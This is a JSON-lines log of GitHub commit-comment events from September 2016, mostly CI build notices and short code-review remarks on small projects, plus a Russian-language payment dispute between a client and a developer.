{"id":"4508196377","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879369,"position":null,"line":null,"path":null,"commit_id":"0b190b11daa653d46f0efffbbf9730b15fe9132e","created_at":"2016-09-02T12:20:43Z","updated_at":"2016-09-02T12:20:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 905](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12373&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T12:20:43Z"}
{"id":"4508199816","type":"CommitCommentEvent","actor":{"login":"Vipi213"},"repo":{"name":"Vipi213/InternshipProject"},"payload":{"comment":{"id":18879389,"position":null,"line":null,"path":null,"commit_id":"992ea99c174e3de7ada3ec949e59071f0319c080","created_at":"2016-09-02T12:21:33Z","updated_at":"2016-09-02T12:21:33Z","body":"Base for the project"}},"created_at":"2016-09-02T12:21:33Z"}
{"id":"4508204371","type":"CommitCommentEvent","actor":{"login":"pvalsecc"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18879405,"position":61,"line":61,"path":"src/gui/editorwidgets/qgskeyvaluewidget.h","commit_id":"db46e89696d668ae8c349ab3b45ceb37876b8af3","created_at":"2016-09-02T12:22:41Z","updated_at":"2016-09-02T12:22:41Z","body":"OK, adding support for maps in QgsExpression::formatPreviewString.\r\nYes, adding support for maps in QgsExpression is planned, but different PR and yes, the same work is planned for lists."}},"created_at":"2016-09-02T12:22:41Z"}
{"id":"4508207474","type":"CommitCommentEvent","actor":{"login":"jaylach"},"repo":{"name":"yenchieh86/bloc-jams"},"payload":{"comment":{"id":18879411,"position":10,"line":5,"path":"album.html","commit_id":"fb956d91d7f7dd3d0db78105ef44761a360d5548","created_at":"2016-09-02T12:23:26Z","updated_at":"2016-09-02T12:23:26Z","body":"I know I said you should put a space before and after the equal sign, but that's only true for languages like JavaScript. Putting them in HTML isn't really a standard practice. You certainly can if you like the way the code reads as it won't harm anything.. but, as I said, it's not a standard practice :)"}},"created_at":"2016-09-02T12:23:26Z"}
{"id":"4508211599","type":"CommitCommentEvent","actor":{"login":"Jahwn"},"repo":{"name":"Jahwn/JohnDavies2406A1"},"payload":{"comment":{"id":18879428,"position":null,"line":null,"path":null,"commit_id":"ad7b1e794bbe9c0c9e30e3fc8e9863e81f045e94","created_at":"2016-09-02T12:24:29Z","updated_at":"2016-09-02T12:24:29Z","body":"Accidentally put files in incorrect locations..."}},"created_at":"2016-09-02T12:24:29Z"}
{"id":"4508212010","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"haykarustamyan/AddressBook"},"payload":{"comment":{"id":18879429,"position":2,"line":5,"path":"src/am/aca/addressbook/repository/telnumberrepository/TelNumberInterface.java","commit_id":"586dd73f5b461ceab05dd8864fd380f172edb023","created_at":"2016-09-02T12:24:34Z","updated_at":"2016-09-02T12:24:34Z","body":"TelNumberInterface -> TelNumberRepositoryInterface"}},"created_at":"2016-09-02T12:24:34Z"}
{"id":"4508212304","type":"CommitCommentEvent","actor":{"login":"Jahwn"},"repo":{"name":"Jahwn/JohnDavies2406A1"},"payload":{"comment":{"id":18879431,"position":null,"line":null,"path":null,"commit_id":"6213461d22a895d61070bc364c40705d6622898a","created_at":"2016-09-02T12:24:39Z","updated_at":"2016-09-02T12:24:39Z","body":"Accidentally put files in incorrect locations..."}},"created_at":"2016-09-02T12:24:39Z"}
{"id":"4508212616","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18879432,"position":null,"line":null,"path":null,"commit_id":"6792ced5ecfd2a0117ee9029fe303e6f68f5dfa1","created_at":"2016-09-02T12:24:43Z","updated_at":"2016-09-02T12:24:43Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/365/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1926)."}},"created_at":"2016-09-02T12:24:43Z"}
{"id":"4508212907","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"haykarustamyan/AddressBook"},"payload":{"comment":{"id":18879433,"position":1,"line":9,"path":"src/am/aca/addressbook/repository/telnumberrepository/TelNumberInterfaceImp.java","commit_id":"586dd73f5b461ceab05dd8864fd380f172edb023","created_at":"2016-09-02T12:24:47Z","updated_at":"2016-09-02T12:24:47Z","body":"TelNumberRepositoryImpl"}},"created_at":"2016-09-02T12:24:47Z"}
{"id":"4508214305","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18879436,"position":null,"line":null,"path":null,"commit_id":"c010e39664ec3d4b450b8e7f8d43703837a55c15","created_at":"2016-09-02T12:25:09Z","updated_at":"2016-09-02T12:25:09Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-124/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-02T12:25:09Z"}
{"id":"4508216375","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18879442,"position":null,"line":null,"path":null,"commit_id":"e1f948d49f03df0cca60103529dd963fecf6c86c","created_at":"2016-09-02T12:25:37Z","updated_at":"2016-09-02T12:25:37Z","body":"Hay que respetar las mayúsculas @nosijf982 en algunos casos\r\nYa que en inglés salen así.\r\nve con más cuidado y revisa antes de guardar la ortografía en español, no queda tanto tiempo como para andar revisando y corrigiendo lo que haces."}},"created_at":"2016-09-02T12:25:37Z"}
{"id":"4508217478","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"haykarustamyan/AddressBook"},"payload":{"comment":{"id":18879444,"position":11,"line":11,"path":"src/am/aca/addressbook/controller/Controller.java","commit_id":"586dd73f5b461ceab05dd8864fd380f172edb023","created_at":"2016-09-02T12:25:54Z","updated_at":"2016-09-02T12:25:54Z","body":"Here you should also keep your repositories\r\nTelNumberReposiotryInterface telNumbRep = TelNumberRepoImpl.getInstence();"}},"created_at":"2016-09-02T12:25:54Z"}
{"id":"4508221509","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"haykarustamyan/AddressBook"},"payload":{"comment":{"id":18879456,"position":58,"line":58,"path":"src/am/aca/addressbook/controller/Controller.java","commit_id":"586dd73f5b461ceab05dd8864fd380f172edb023","created_at":"2016-09-02T12:26:54Z","updated_at":"2016-09-02T12:26:54Z","body":"In this controller methods you should do repository calls\r\nuserRepo.addUser(User);"}},"created_at":"2016-09-02T12:26:54Z"}
{"id":"4508221961","type":"CommitCommentEvent","actor":{"login":"fmeyer"},"repo":{"name":"ganddev/breminale_api"},"payload":{"comment":{"id":18879457,"position":null,"line":null,"path":null,"commit_id":"82ae1fdbb5ec743d91e03abcd18fdc9a7e336e56","created_at":"2016-09-02T12:27:01Z","updated_at":"2016-09-02T12:27:01Z","body":"More work is needed :) \r\n"}},"created_at":"2016-09-02T12:27:01Z"}
{"id":"4508223759","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"haykarustamyan/AddressBook"},"payload":{"comment":{"id":18879464,"position":5,"line":7,"path":"src/am/aca/addressbook/repository/telnumberrepository/TelNumberInterface.java","commit_id":"586dd73f5b461ceab05dd8864fd380f172edb023","created_at":"2016-09-02T12:27:27Z","updated_at":"2016-09-02T12:27:27Z","body":"Set<TelNumber> showTelNumbers();"}},"created_at":"2016-09-02T12:27:27Z"}
{"id":"4508225664","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"haykarustamyan/AddressBook"},"payload":{"comment":{"id":18879469,"position":4,"line":7,"path":"src/am/aca/addressbook/repository/telnumberrepository/TelNumberInterface.java","commit_id":"586dd73f5b461ceab05dd8864fd380f172edb023","created_at":"2016-09-02T12:27:56Z","updated_at":"2016-09-02T12:27:56Z","body":"void deleteTelNumber(TelNumber telNumber) throws InvalidTelNumberException;"}},"created_at":"2016-09-02T12:27:56Z"}
{"id":"4508226671","type":"CommitCommentEvent","actor":{"login":"kissarat"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879471,"position":null,"line":null,"path":null,"commit_id":"1dadd7cb59c2c42a85d482f2e1a27198a35c72b8","created_at":"2016-09-02T12:28:12Z","updated_at":"2016-09-02T12:28:12Z","body":"Да. Но никто мне ничего оплачивать и не собирался, как и котролировать и оценивать. Для меня вообще было дико, чтобы я, кажись, получил работу, ходил на ней же на собеседования"}},"created_at":"2016-09-02T12:28:12Z"}
{"id":"4508227164","type":"CommitCommentEvent","actor":{"login":"ax3l"},"repo":{"name":"ornladios/ADIOS"},"payload":{"comment":{"id":18879472,"position":null,"line":null,"path":null,"commit_id":"3b21a8a4150962c6938baeceacd04f619cea2fbc","created_at":"2016-09-02T12:28:18Z","updated_at":"2016-09-02T12:28:18Z","body":"thank you for the quick fix! :)"}},"created_at":"2016-09-02T12:28:18Z"}
{"id":"4508231158","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"Sycholic/PermissionsEx-1.23.x-Maintained"},"payload":{"comment":{"id":18879481,"position":null,"line":null,"path":null,"commit_id":"11f40294ecfe4c0f0f0bd155d9a85c8283ede6ea","created_at":"2016-09-02T12:29:15Z","updated_at":"2016-09-02T12:29:15Z","body":"Nope, using default en_us language locale as far as I know."}},"created_at":"2016-09-02T12:29:15Z"}
{"id":"4508234204","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879488,"position":74,"line":139,"path":"api/views.py","commit_id":"99b769398088907a00138f37b5dcfd52cca54083","created_at":"2016-09-02T12:29:58Z","updated_at":"2016-09-02T12:29:58Z","body":"Смотри, если бы ты работал каждый день, как оговаривалось, тогда вопросов не было, во-вторых, мы ожидали видеть коммиты ежедневно, а по 5 строчек кода в день, при чем там никаких математических алгоритмов не было - ну это смешно. В-третьих, мы работали с тобой через посредника, всем, кто работал с нами через них - мы уплатили. \r\n\r\nБыла пятница, когда от тебя ждали результата, как сейчас помню, тебя не было в скайпе, тебя посредники искали. Ну это совсем не дело.\r\n\r\n> On Sep 2, 2016, at 3:12 PM, Taras Labiak <notifications@github.com> wrote:\r\n> \r\n> Забыл за багзиллу. Короче говоря, да, наверно я делал долго, уже и не помню. А еще я не был согласен с реализацией, но ты усомнится в своей правоте тоже не мог\r\n> \r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub <https://github.com/kissarat/roundtableserver/commit/99b769398088907a00138f37b5dcfd52cca54083#commitcomment-18879290>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAvqihfAW8TB2vOE5D03azdPoNWgjckLks5qmBLBgaJpZM4JzoPn>.\r\n> \r\n\r\n"}},"created_at":"2016-09-02T12:29:58Z"}
{"id":"4508235841","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879491,"position":null,"line":null,"path":null,"commit_id":"0b190b11daa653d46f0efffbbf9730b15fe9132e","created_at":"2016-09-02T12:30:21Z","updated_at":"2016-09-02T12:30:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 905](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12373&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 234, ignored: 3 Build time: 00:09:38"}},"created_at":"2016-09-02T12:30:21Z"}
{"id":"4508240307","type":"CommitCommentEvent","actor":{"login":"ivancara"},"repo":{"name":"ivancara/NewIdeas"},"payload":{"comment":{"id":18879502,"position":null,"line":null,"path":null,"commit_id":"86e66cc6709f606332e2a782e2a129ec61450d6a","created_at":"2016-09-02T12:31:20Z","updated_at":"2016-09-02T12:31:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;fbxlfqVm&#x2F;12-desenvolvimento-da-interface-de-login\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Desenvolvimento da Interface de Login</a>"}},"created_at":"2016-09-02T12:31:20Z"}
{"id":"4508240391","type":"CommitCommentEvent","actor":{"login":"ivancara"},"repo":{"name":"ivancara/NewIdeas"},"payload":{"comment":{"id":18879503,"position":null,"line":null,"path":null,"commit_id":"86e66cc6709f606332e2a782e2a129ec61450d6a","created_at":"2016-09-02T12:31:22Z","updated_at":"2016-09-02T12:31:22Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;fbxlfqVm&#x2F;12-desenvolvimento-da-interface-de-login\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Desenvolvimento da Interface de Login</a>"}},"created_at":"2016-09-02T12:31:22Z"}
{"id":"4508244193","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879517,"position":null,"line":null,"path":null,"commit_id":"1dadd7cb59c2c42a85d482f2e1a27198a35c72b8","created_at":"2016-09-02T12:32:19Z","updated_at":"2016-09-02T12:32:19Z","body":"Еще раз напишу - я - заказчик, все средства были переданы твоему посреднику. Инвойсы есть. То, что тебе одному не уплатили, было договорено с посредником, ибо работа была на отъебтсь - действительно дико, когда принимаешь на full time, а человек появляется через день-два, а то и пять\r\n\r\n> On Sep 2, 2016, at 3:28 PM, Taras Labiak <notifications@github.com> wrote:\r\n> \r\n> Да. Но никто мне ничего оплачивать и не собирался, как и котролировать и оценивать. Для меня вообще было дико, чтобы я, кажись, получил работу, ходил на ней же на собеседования\r\n> \r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub <https://github.com/kissarat/roundtableserver/commit/1dadd7cb59c2c42a85d482f2e1a27198a35c72b8#commitcomment-18879471>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAvqijpt0dUOoaztBFVMx8xegO17qG7-ks5qmBZcgaJpZM4Jzo6D>.\r\n"}},"created_at":"2016-09-02T12:32:19Z"}
{"id":"4508247059","type":"CommitCommentEvent","actor":{"login":"LavrovArtem"},"repo":{"name":"LavrovArtem/testcafe-hammerhead"},"payload":{"comment":{"id":18879530,"position":32,"line":785,"path":"src/client/sandbox/code-instrumentation/properties/index.js","commit_id":"2983dca1b2874a30e74927fa8080b9366a6ecb5a","created_at":"2016-09-02T12:32:59Z","updated_at":"2016-09-02T12:32:59Z","body":"1. ok\r\n2. `owner[INTERNAL_PROPS.processedContext]` doesn't accessor, it's other window"}},"created_at":"2016-09-02T12:32:59Z"}
{"id":"4508248889","type":"CommitCommentEvent","actor":{"login":"SuperCoac"},"repo":{"name":"GenjitsuGame/cspspc"},"payload":{"comment":{"id":18879534,"position":3,"line":39,"path":"scripts/globals.lua","commit_id":"d34918f2b5fe147afddddd1277636b3b51de152f","created_at":"2016-09-02T12:33:26Z","updated_at":"2016-09-02T12:33:26Z","body":"With the loop version, you just have to sort your WEAPON_TYPES according to your priority\r\nExample : WEAPON_TYPES.RIFLE > WEAPON_TYPES.PISTOL> WEAPON_TYPES.GRENADE \r\n\r\nAnd newCurrentWeapon is not only called when you pickup a weapon, so you can also change your weapon to knife using this method"}},"created_at":"2016-09-02T12:33:26Z"}
{"id":"4508252372","type":"CommitCommentEvent","actor":{"login":"serjant"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879542,"position":null,"line":null,"path":null,"commit_id":"1dadd7cb59c2c42a85d482f2e1a27198a35c72b8","created_at":"2016-09-02T12:34:14Z","updated_at":"2016-09-02T12:34:14Z","body":"И по-твоему описать метод REST DELETE в доке в 10 строк занимает 2 часа?\r\n\r\n\r\n> On Sep 2, 2016, at 3:32 PM, David Baum <serjantik@gmail.com> wrote:\r\n> \r\n> Еще раз напишу - я - заказчик, все средства были переданы твоему посреднику. Инвойсы есть. То, что тебе одному не уплатили, было договорено с посредником, ибо работа была на отъебтсь - действительно дико, когда принимаешь на full time, а человек появляется через день-два, а то и пять\r\n> \r\n>> On Sep 2, 2016, at 3:28 PM, Taras Labiak <notifications@github.com <mailto:notifications@github.com>> wrote:\r\n>> \r\n>> Да. Но никто мне ничего оплачивать и не собирался, как и котролировать и оценивать. Для меня вообще было дико, чтобы я, кажись, получил работу, ходил на ней же на собеседования\r\n>> \r\n>> —\r\n>> You are receiving this because you commented.\r\n>> Reply to this email directly, view it on GitHub <https://github.com/kissarat/roundtableserver/commit/1dadd7cb59c2c42a85d482f2e1a27198a35c72b8#commitcomment-18879471>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAvqijpt0dUOoaztBFVMx8xegO17qG7-ks5qmBZcgaJpZM4Jzo6D>.\r\n>> \r\n\r\n"}},"created_at":"2016-09-02T12:34:14Z"}
{"id":"4508254425","type":"CommitCommentEvent","actor":{"login":"kissarat"},"repo":{"name":"kissarat/roundtableserver"},"payload":{"comment":{"id":18879547,"position":null,"line":null,"path":null,"commit_id":"1dadd7cb59c2c42a85d482f2e1a27198a35c72b8","created_at":"2016-09-02T12:34:43Z","updated_at":"2016-09-02T12:34:43Z","body":"Только мне говорили, что им не заплатили за меня. В конечном счете я им одного клиента запорол в конце-концов, не намереваесь это сделать сознательно"}},"created_at":"2016-09-02T12:34:43Z"}
{"id":"4508256214","type":"CommitCommentEvent","actor":{"login":"hexode"},"repo":{"name":"sorokin-evgeni/react-learning"},"payload":{"comment":{"id":18879552,"position":73,"line":73,"path":"front/index.html","commit_id":"d3ffce5a2754e91147900bdf244c97dedac08e11","created_at":"2016-09-02T12:35:11Z","updated_at":"2016-09-02T12:35:11Z","body":"Тут лучше использовать refs https://facebook.github.io/react/docs/more-about-refs.html. Если конечно в AmCharts можно передать ноду, а не селектор."}},"created_at":"2016-09-02T12:35:11Z"}
{"id":"4508259927","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/Address-book"},"payload":{"comment":{"id":18879565,"position":8,"line":8,"path":"src/com/repository/UserRepositoryInterface.java","commit_id":"27bab758712932714e94367e0de59c3d4c733637","created_at":"2016-09-02T12:36:04Z","updated_at":"2016-09-02T12:36:04Z","body":"public void addUser(User user); \r\nshould be \r\npublic User addUser(User user) throws InvalidArgumentException;"}},"created_at":"2016-09-02T12:36:04Z"}
{"id":"4508260055","type":"CommitCommentEvent","actor":{"login":"keithbostic"},"repo":{"name":"wiredtiger/wiredtiger"},"payload":{"comment":{"id":18879567,"position":6,"line":50,"path":"src/os_common/os_alloc.c","commit_id":"b62887066754eefae6150c8634e9340c0fad2767","created_at":"2016-09-02T12:36:06Z","updated_at":"2016-09-02T12:36:06Z","body":"@sulabhM, I was curious about this change. We set `WT_CONN_SERVER_RUN` really early on, so I wasn't clear on why the test -- won't the allocations before `WT_CONN_SERVER_RUN` is set be too few to matter?"}},"created_at":"2016-09-02T12:36:06Z"}
{"id":"4508260934","type":"CommitCommentEvent","actor":{"login":"pankajbanda"},"repo":{"name":"pankajbanda/Hello-World"},"payload":{"comment":{"id":18879569,"position":null,"line":null,"path":null,"commit_id":"7786b93ae9d18bf33ca348d7cb7a712c34af1f23","created_at":"2016-09-02T12:36:18Z","updated_at":"2016-09-02T12:36:18Z","body":"getilhjdg ohelmkbe=0gf;b]dg"}},"created_at":"2016-09-02T12:36:18Z"}
{"id":"4508261262","type":"CommitCommentEvent","actor":{"login":"iliasbartolini"},"repo":{"name":"TransparencyToolkit/LookingGlass"},"payload":{"comment":{"id":18879571,"position":1,"line":1,"path":"public/document-viewer","commit_id":"2421a5fe25f756d1841195709ee225cb1445f34f","created_at":"2016-09-02T12:36:23Z","updated_at":"2016-09-02T12:36:23Z","body":"Was this reintroduced inadvertently or is a submodule reference missing?"}},"created_at":"2016-09-02T12:36:23Z"}
{"id":"4508261625","type":"CommitCommentEvent","actor":{"login":"pankajbanda"},"repo":{"name":"pankajbanda/Hello-World"},"payload":{"comment":{"id":18879572,"position":1,"line":1,"path":"README.md","commit_id":"7786b93ae9d18bf33ca348d7cb7a712c34af1f23","created_at":"2016-09-02T12:36:28Z","updated_at":"2016-09-02T12:36:28Z","body":"yhtr6nghhrntr"}},"created_at":"2016-09-02T12:36:28Z"}
{"id":"4508262414","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/Address-book"},"payload":{"comment":{"id":18879576,"position":10,"line":10,"path":"src/com/repository/UserRepositoryInterface.java","commit_id":"27bab758712932714e94367e0de59c3d4c733637","created_at":"2016-09-02T12:36:40Z","updated_at":"2016-09-02T12:36:40Z","body":"public User editUser(User user);\r\nshould be \r\npublic User editUser(User user)  throws InvalidArgumentException;"}},"created_at":"2016-09-02T12:36:40Z"}
{"id":"4508262687","type":"CommitCommentEvent","actor":{"login":"kuguarpwnz"},"repo":{"name":"bladewolk/testversus"},"payload":{"comment":{"id":18879577,"position":21,"line":21,"path":"KATA #10 Are they the \"same\"?/index.php","commit_id":"a33f99e0d73a5710e02f0f8441318078b45ab700","created_at":"2016-09-02T12:36:44Z","updated_at":"2016-09-02T12:36:44Z","body":"double sort? rly? :+1: "}},"created_at":"2016-09-02T12:36:44Z"}
{"id":"4508263523","type":"CommitCommentEvent","actor":{"login":"oppor5s"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18879583,"position":7,"line":669,"path":"api-license-agreement.txt","commit_id":"d508904ea6514cb3fd9060a27f1f5b929cb75eb9","created_at":"2016-09-02T12:36:55Z","updated_at":"2016-09-02T12:36:55Z","body":"yup"}},"created_at":"2016-09-02T12:36:55Z"}
{"id":"4508264162","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/Address-book"},"payload":{"comment":{"id":18879585,"position":12,"line":12,"path":"src/com/repository/UserRepositoryInterface.java","commit_id":"27bab758712932714e94367e0de59c3d4c733637","created_at":"2016-09-02T12:37:06Z","updated_at":"2016-09-02T12:37:06Z","body":"public void delateUser(int userId);\r\nshould be \r\npublic void delateUser(int userId) throws InvalidArgumentException;"}},"created_at":"2016-09-02T12:37:06Z"}
{"id":"4508264907","type":"CommitCommentEvent","actor":{"login":"kuguarpwnz"},"repo":{"name":"bladewolk/testversus"},"payload":{"comment":{"id":18879588,"position":22,"line":22,"path":"KATA #10 Are they the \"same\"?/index.php","commit_id":"a33f99e0d73a5710e02f0f8441318078b45ab700","created_at":"2016-09-02T12:37:15Z","updated_at":"2016-09-02T12:37:15Z","body":"you can do something like this: `array_map('sqrt', $a2)`. but  that's not a good idea"}},"created_at":"2016-09-02T12:37:15Z"}
{"id":"4508264982","type":"CommitCommentEvent","actor":{"login":"dracwyrm"},"repo":{"name":"dracwyrm/gentoo-ebuilds"},"payload":{"comment":{"id":18879589,"position":null,"line":null,"path":null,"commit_id":"740088244b1a237d582a116c4391af2232046382","created_at":"2016-09-02T12:37:16Z","updated_at":"2016-09-02T12:37:16Z","body":"Whoops. Missed that when I bumped. I meant to rename the patch to .4 since .3 no longer exists. Good find. :)"}},"created_at":"2016-09-02T12:37:16Z"}
{"id":"4508267271","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/Address-book"},"payload":{"comment":{"id":18879597,"position":14,"line":14,"path":"src/com/repository/UserRepositoryInterface.java","commit_id":"27bab758712932714e94367e0de59c3d4c733637","created_at":"2016-09-02T12:37:46Z","updated_at":"2016-09-02T12:37:46Z","body":"public List<User> getUsers(int userId);\r\nshould be \r\npublic List<User> getFriends(int userId) throws InvalidArgumentException;"}},"created_at":"2016-09-02T12:37:46Z"}
{"id":"4508270568","type":"CommitCommentEvent","actor":{"login":"qigongzi"},"repo":{"name":"qigongzi/web"},"payload":{"comment":{"id":18879611,"position":null,"line":null,"path":null,"commit_id":"eafc23d6ebce75b840a9f08daec4458a8a7fe9c5","created_at":"2016-09-02T12:38:30Z","updated_at":"2016-09-02T12:38:30Z","body":"add the despiction of demo"}},"created_at":"2016-09-02T12:38:30Z"}
{"id":"4508270816","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18879614,"position":67,"line":64,"path":"ficbot.js","commit_id":"4497ff909c700fcc506ef15e2ce7540e603aadfc","created_at":"2016-09-02T12:38:33Z","updated_at":"2016-09-02T12:38:33Z","body":"yes, should be `\\\\$`"}},"created_at":"2016-09-02T12:38:33Z"}
{"id":"4508271801","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/Address-book"},"payload":{"comment":{"id":18879619,"position":4,"line":4,"path":"src/com/phoneNumber/Number.java","commit_id":"27bab758712932714e94367e0de59c3d4c733637","created_at":"2016-09-02T12:38:46Z","updated_at":"2016-09-02T12:38:46Z","body":"should also has id\r\nprivate String id;"}},"created_at":"2016-09-02T12:38:46Z"}
{"id":"4508273404","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18879624,"position":69,"line":66,"path":"ficbot.js","commit_id":"4497ff909c700fcc506ef15e2ce7540e603aadfc","created_at":"2016-09-02T12:39:07Z","updated_at":"2016-09-02T12:39:07Z","body":"using carat as an operator, not a literal character, shouldn't have leading backslash `[^\"]`"}},"created_at":"2016-09-02T12:39:07Z"}
{"id":"4508275137","type":"CommitCommentEvent","actor":{"login":"Rhythuveeen"},"repo":{"name":"Rhythuveeen/Guru99SeleniumProject"},"payload":{"comment":{"id":18879629,"position":3,"line":3,"path":"README.md","commit_id":"3a186205c8568e8af3451045f334775b108394c8","created_at":"2016-09-02T12:39:30Z","updated_at":"2016-09-02T12:39:30Z","body":"This is the Read me file"}},"created_at":"2016-09-02T12:39:30Z"}
{"id":"4508277558","type":"CommitCommentEvent","actor":{"login":"guillermoga88"},"repo":{"name":"guillermoga88/discourse"},"payload":{"comment":{"id":18879634,"position":null,"line":null,"path":null,"commit_id":"95b2de12798d6053f006a08684082e5b3cbc65d6","created_at":"2016-09-02T12:40:02Z","updated_at":"2016-09-02T12:40:02Z","body":"Fixed duplicated content and titles. \r\nLowercases users URL and updating absolute paths."}},"created_at":"2016-09-02T12:40:02Z"}
{"id":"4508279494","type":"CommitCommentEvent","actor":{"login":"mirabilos"},"repo":{"name":"mathiasbynens/evil.sh"},"payload":{"comment":{"id":18879638,"position":4,"line":6,"path":"README.md","commit_id":"facbbc05d3d6f8f5c2b9a7ab408a1ff815d6182b","created_at":"2016-09-02T12:40:27Z","updated_at":"2016-09-02T12:40:27Z","body":"Good that `\\alias` still works, then ☺ But yes, devilish.\r\n\r\n//mirabilos, developer of the `mksh` shell"}},"created_at":"2016-09-02T12:40:27Z"}
{"id":"4508280607","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18879641,"position":null,"line":null,"path":null,"commit_id":"ba73f208fcf7b3a7ae60277428b7395d041e15b9","created_at":"2016-09-02T12:40:42Z","updated_at":"2016-09-02T12:40:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 906](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12389&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T12:40:42Z"}
{"id":"4508282573","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"SergeyHar/Address-book"},"payload":{"comment":{"id":18879648,"position":8,"line":8,"path":"src/com/User.java","commit_id":"27bab758712932714e94367e0de59c3d4c733637","created_at":"2016-09-02T12:41:10Z","updated_at":"2016-09-02T12:41:10Z","body":"You can keep util class for \"private static int next_id = 0;\""}},"created_at":"2016-09-02T12:41:10Z"}
{"id":"4508286243","type":"CommitCommentEvent","actor":{"login":"andela-kndungu"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18879655,"position":null,"line":null,"path":null,"commit_id":"168b8cadf799c78ecf898d0a26c91f5eaa1f9004","created_at":"2016-09-02T12:42:00Z","updated_at":"2016-09-02T12:42:00Z","body":"👍\n\nOn Thu, Sep 1, 2016 at 7:36 PM, kesienaAkp <notifications@github.com> wrote:\n\n> Seen, nice.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/andela-kndungu/document-ms-frontend/commit/168b8cadf799c78ecf898d0a26c91f5eaa1f9004#commitcomment-18866611>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQfoE1aSVNZRgu22wgh3uzn3tnayUR0aks5qlv8lgaJpZM4Jy5Be>\n> .\n>\n\n\n\n-- \n*Kinuthia Ndung'u /** Andela.com\n<http://andela.com/?utm_source=andela&utm_medium=email&utm_campaign=signature> *\n*Software Developer / +254722826987 <646.620.0604> / @Andela\n<http://bit.ly/andelatwitter>*\nWe're hiring! Check out our careers page. <http://bit.ly/andelacareers>\n"}},"created_at":"2016-09-02T12:42:00Z"}
